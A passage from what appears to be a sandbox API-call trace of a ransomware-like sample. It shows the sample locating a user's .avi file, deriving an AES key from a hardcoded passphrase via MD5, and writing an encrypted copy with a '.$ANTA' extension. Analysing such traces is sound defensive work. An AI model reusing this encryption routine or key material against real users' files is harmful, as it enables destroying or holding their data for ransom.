lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0099.257] CloseHandle (hObject=0x298) returned 1 [0099.257] FreeLibrary (hLibModule=0x772d0000) returned 1 [0099.257] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0099.257] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\NLad7.avi", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe64f3ab0, ftCreationTime.dwHighDateTime=0x1d5e4a0, ftLastAccessTime.dwLowDateTime=0x82f1e440, ftLastAccessTime.dwHighDateTime=0x1d5eb1c, ftLastWriteTime.dwLowDateTime=0x82f1e440, ftLastWriteTime.dwHighDateTime=0x1d5eb1c, nFileSizeHigh=0x0, nFileSizeLow=0x16f6b, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="NLad7.avi", cAlternateFileName="")) returned 0x41ac140 [0099.307] FindClose (in: hFindFile=0x41ac140 | out: hFindFile=0x41ac140) returned 1 [0099.307] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0099.307] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0099.307] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0099.307] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0099.307] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0099.307] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0099.307] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797048, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0099.307] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0099.307] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0099.308] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5250) returned 1 [0099.308] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0099.308] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0099.309] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0099.309] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0099.309] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0099.309] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0099.353] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0099.353] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0099.353] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0099.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0099.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca688, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0099.354] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0099.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0099.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2c08, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0099.354] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0099.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0099.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0099.354] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0099.354] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0099.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0099.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca568, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0099.354] CryptHashData (hHash=0x41ac500, pbData=0x17e2728, dwDataLen=0x22, dwFlags=0x1) returned 1 [0099.354] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0099.354] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0099.354] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0099.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0099.355] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca748, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0099.355] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac500, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac6c0) returned 1 [0099.355] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0099.355] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0099.355] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0099.355] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796fc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0099.355] CryptDestroyHash (hHash=0x41ac500) returned 1 [0099.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0099.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eab80 [0099.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0099.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0099.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0099.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0099.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0099.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0099.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0099.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0099.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0099.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0099.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0099.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0099.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0099.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0099.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0099.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0099.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0099.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0099.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eab80 [0099.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0099.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0099.356] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0099.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0099.356] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0099.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0099.356] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0099.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0099.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0099.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0099.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0099.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0099.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0099.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0099.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0099.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0099.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0099.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43ed3b0 [0099.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0099.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0099.357] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\NLad7.avi" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\nlad7.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0099.357] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.357] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0099.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0099.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0099.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0099.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0099.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0099.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0099.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0099.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0099.358] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0099.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0099.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0099.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0099.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0099.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0099.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0099.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0099.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0099.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0099.358] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0099.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0099.358] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0099.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0099.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0099.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0099.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0099.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0099.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0099.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0099.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0099.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0099.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0099.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0099.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0099.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0099.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0099.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0099.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0099.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0099.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0099.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0099.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0099.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0099.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0099.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0099.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0099.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0099.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0099.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0099.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0099.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431d8c0 [0099.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0099.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a030 [0099.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0099.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369f80 [0099.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431d8c0 | out: hHeap=0x1780000) returned 1 [0099.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0099.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0099.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0099.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0099.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0099.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a030 | out: hHeap=0x1780000) returned 1 [0099.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0099.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0099.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0099.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0099.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369c68 [0099.360] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc")) returned 0x10 [0099.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369c68 | out: hHeap=0x1780000) returned 1 [0099.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0099.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369f80 | out: hHeap=0x1780000) returned 1 [0099.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0099.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0099.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0099.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0099.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0099.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0099.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0099.361] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\NLad7.avi.$ANTA" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\nlad7.avi.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0099.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0099.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0099.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0099.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0099.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0099.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0099.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0099.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0099.362] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0099.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0099.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0099.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0099.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0099.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0099.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0099.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0099.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0099.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0099.362] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0099.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0099.362] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0099.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0099.362] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0099.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0099.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0099.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0099.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0099.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0099.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0099.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0099.363] 